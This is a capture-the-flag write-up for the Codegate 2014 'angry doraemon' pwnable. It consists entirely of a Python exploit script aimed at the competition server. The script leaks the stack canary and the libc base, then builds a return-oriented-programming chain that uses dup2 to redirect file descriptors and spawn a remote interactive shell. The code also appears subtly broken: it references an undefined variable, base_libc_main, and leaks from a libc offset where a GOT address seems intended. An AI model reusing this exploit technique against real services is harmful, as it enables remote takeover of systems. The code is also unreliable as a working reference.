Codegate 2014 doraemon write up by @_g05u_

1. #!/usr/bin/env python
2. #-*- coding:utf-8 -*-
3.  
4. # Codegate 2014 write up by @_g05u_
5. # angry doraemon
6. # pwnable 250
7. # null-life.com
8.  
9. import re
10. import os
11. import sys
12. import math
13. import time
14. import struct
15. import socket
16.  
17. HOST = "58.229.183.18"
18. PORT = 8888
19.  
20. #Ubuntu 13.10 x86
21. offset_libc_main = 0x19810
22. offset_dup2 = 0xE11F0
23.  
24. got_libc_main = 0x0804B038
25. got_write = 0x080486e0
26. rop_pop2_ret = 0x080495BE
27. exec_sh = 0x08048C62
28.  
29. canary = "\x00\x8b\xc3\x84"
30.  
31.  
32. def get_socket():
33.     f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
34.     f.connect((HOST, PORT))
35.     return f
36.    
37. def read_logo(s):
38.     logo = ''
39.     menu = ''
40.     while 'Waiting 2 seconds' not in logo:
41.         logo = s.recv(1024 * 5)
42.     time.sleep(2.2) #wait 2.2 sec
43.     while '>' not in menu:
44.         menu = s.recv(1024)
45.        
46.  
47. def gadget_leer(addr, n):
48.     data  = struct.pack("<I", got_write)
49.     data += struct.pack("<I", 0x080492c5) #exit return
50.     data += struct.pack("<I", 0x4) #fd abierto
51.     data += struct.pack("<I", addr)
52.     data += struct.pack("<I", n)
53.    
54.     return data
55.  
56. def get_canary():
57.     print '[+] get canary '
58.     s = get_socket()   
59.     read_logo(s)
60.     s.send('4')
61.     time.sleep(0.1)
62.     s.recv(1024) #leer pregunta
63.     time.sleep(0.1)
64.     s.send('y'*10)
65.     time.sleep(0.1)
66.     mi_opc = s.recv(26) #leer mi opcion
67.     _canary = mi_opc[22:]
68.     print '[+] Canary 0x%s' % (''.join(c.encode('hex') for c in _canary))
69.     return _canary
70.  
71. def get_rop_shell(libc_base):
72.     print '[+] dup2 address: %s' % hex(libc_base + offset_dup2)
73.     data  = struct.pack("<I", libc_base + offset_dup2)
74.     data += struct.pack("<I", rop_pop2_ret)
75.     data += struct.pack("<I", 4) #fd abierto
76.     data += struct.pack("<I", 0)
77.    
78.     data += struct.pack("<I", libc_base + offset_dup2)
79.     data += struct.pack("<I", rop_pop2_ret)
80.     data += struct.pack("<I", 4) #fd abierto
81.     data += struct.pack("<I", 1)
82.    
83.     data += struct.pack("<I", libc_base + offset_dup2)
84.     data += struct.pack("<I", rop_pop2_ret)
85.     data += struct.pack("<I", 4) #fd abierto
86.     data += struct.pack("<I", 2)
87.  
88.     data += struct.pack("<I", exec_sh) 
89.     return data
90.  
91. canary = get_canary()
92.    
93. print 'Obteniendo libc base'
94. #get libc address base 
95. s = get_socket()   
96. read_logo(s)
97. s.send('4')
98. time.sleep(0.1)
99. s.recv(1024) #leer pregunta
100. time.sleep(0.1)
101. s.send('y'*10 + canary + "A"*12 + gadget_leer(offset_libc_main, 4))
102. libc_base_address = struct.unpack("<I", s.recv(4))[0] - base_libc_main
103. print '[+] Addres libc base: %s' % hex(libc_base_address)
104.  
105. print 'Lanzando shell'
106. #lanzar shell
107. rop_shell = get_rop_shell(libc_base_address)
108. s = get_socket()   
109. read_logo(s)
110. s.send('4')
111. time.sleep(0.1)
112. s.recv(1024) #leer pregunta
113. time.sleep(0.1)
114. s.send('y'*10 + canary + "A"*12 + rop_shell)
115.  
116. while True:
117.     sys.stdout.write("$ ")
118.     sys.stdout.flush()
119.     c = sys.stdin.readline()
120.     s.send(c)
121.     time.sleep(0.5)
122.     print s.recv(4095)